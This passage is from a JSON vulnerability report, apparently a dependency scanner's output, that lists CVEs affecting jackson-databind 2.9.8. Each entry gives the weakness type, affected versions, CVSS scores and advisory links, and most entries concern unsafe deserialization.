Mailing List","url":"https://lists.apache.org/thread.html/rdf311f13e6356297e0ffe74397fdd25a3687b0a16e687c3ff5b834d8@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdf8d389271a291dde3b2f99c36918d6cb1e796958af626cc140fee23@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re7326b8655eab931f2a9ce074fd9a1a51b5db11456bee9b48e1e170c@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re8ae2670ec456ef1c5a2a661a2838ab2cd00e9efa1e88c069f546f21@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf28ab6f224b48452afd567dfffb705fbda0fdbbf6535f6bc69d47e91@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc1ccfe89332155b72ce17f13a2701d3e7b9ec213324ceb90e79a28a@%3Cdev.ranger.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8840"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8840"},{"summary":"NetApp Advisory ntap-20200327-0002","url":"https://security.netapp.com/advisory/ntap-20200327-0002"},{"summary":"Oracle Advisory cpuapr2020","url":"https://www.oracle.com/security-alerts/cpuapr2020.html"},{"summary":"Oracle Advisory 
cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.3"]}],"title":"CVE-2020-8840/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36518"]}],"cve":"CVE-2020-36518","cwe":{"id":"787","name":"Out-of-bounds Write"},"discovery_date":"2022-03-12T00:00:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-36518"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5283"},{"system_name":"NetApp Advisory","text":"ntap-20220506-0004"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deeply nested json in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Deeply nested json in jackson-databind jackson-databind is a data-binding package for the Jackson Data Processor. 
jackson-databind allows a Java stack overflow exception and denial of service via a large depth of nested objects."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/05/msg00001.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36518"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36518"},{"summary":"NetApp Advisory ntap-20220506-0004","url":"https://security.netapp.com/advisory/ntap-20220506-0004"},{"summary":"Debian Advisory dsa-5283","url":"https://www.debian.org/security/2022/dsa-5283"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]}],"title":"CVE-2020-36518/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https:
//nvd.nist.gov/vuln/detail/CVE-2020-11112"]}],"cve":"CVE-2020-11112","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-10T21:12:41","ids":[{"system_name":"CVE Record","text":"CVE-2020-11112"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.proxy.provider.remoting.RmiProvider (aka apache/commons-proxy)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11112"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11112"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory 
cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11112/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-20190"]}],"cve":"CVE-2021-20190","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-01-20T21:20:15","ids":[{"system_name":"CVE Record","text":"CVE-2021-20190"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"NetApp Advisory","text":"ntap-20210219-0008"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1916633"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of 
untrusted data in jackson-databind A flaw was found in jackson-databind before 2.9.10.7 and 2.6.7.5. FasterXML mishandles the interaction between serialization gadgets and typing. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.7"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.7"]},"references":[{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1916633"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r380e9257bacb8551ee6fcf2c59890ae9477b2c78e553fa9ea08e9d9a@%3Ccommits.nifi.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20190"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20190"},{"summary":"NetApp Advisory ntap-20210219-0008","url":"https://security.netapp.com/advisory/ntap-20210219-0008"},{"summary":"Oracle Advisory 
cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.7"]}],"title":"CVE-2021-20190/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9546"]}],"cve":"CVE-2020-9546","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T21:08:40","ids":[{"system_name":"CVE Record","text":"CVE-2020-9546"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML 
jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing 
List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9546"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9546"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-9546/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-35728"]}],
"cve":"CVE-2020-35728","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:24","ids":[{"system_name":"CVE Record","text":"CVE-2020-35728"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210129-0007"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Serialization gadget exploit in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Serialization gadget exploit in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35728"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35728"},{"summary":"NetApp Advisory 
ntap-20210129-0007","url":"https://security.netapp.com/advisory/ntap-20210129-0007"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-35728/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10969"]}],"cve":"CVE-2020-10969","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T21:36:03","ids":[{"system_name":"CVE Record","text":"CVE-2020-10969"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle 
Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10969"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10969"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-10969/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36182"]}],"cve":"CVE-2020-36182","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:46","ids":[{"system_name":"CVE Record","text":"CVE-2020-36182"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between 
serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36182"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36182"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36182/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36180"]}],"cve":"CVE-2020-36180","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:18","ids":[{"system_name":"CVE Record","text":"CVE-2020-36180"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between 
serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36180"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36180"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
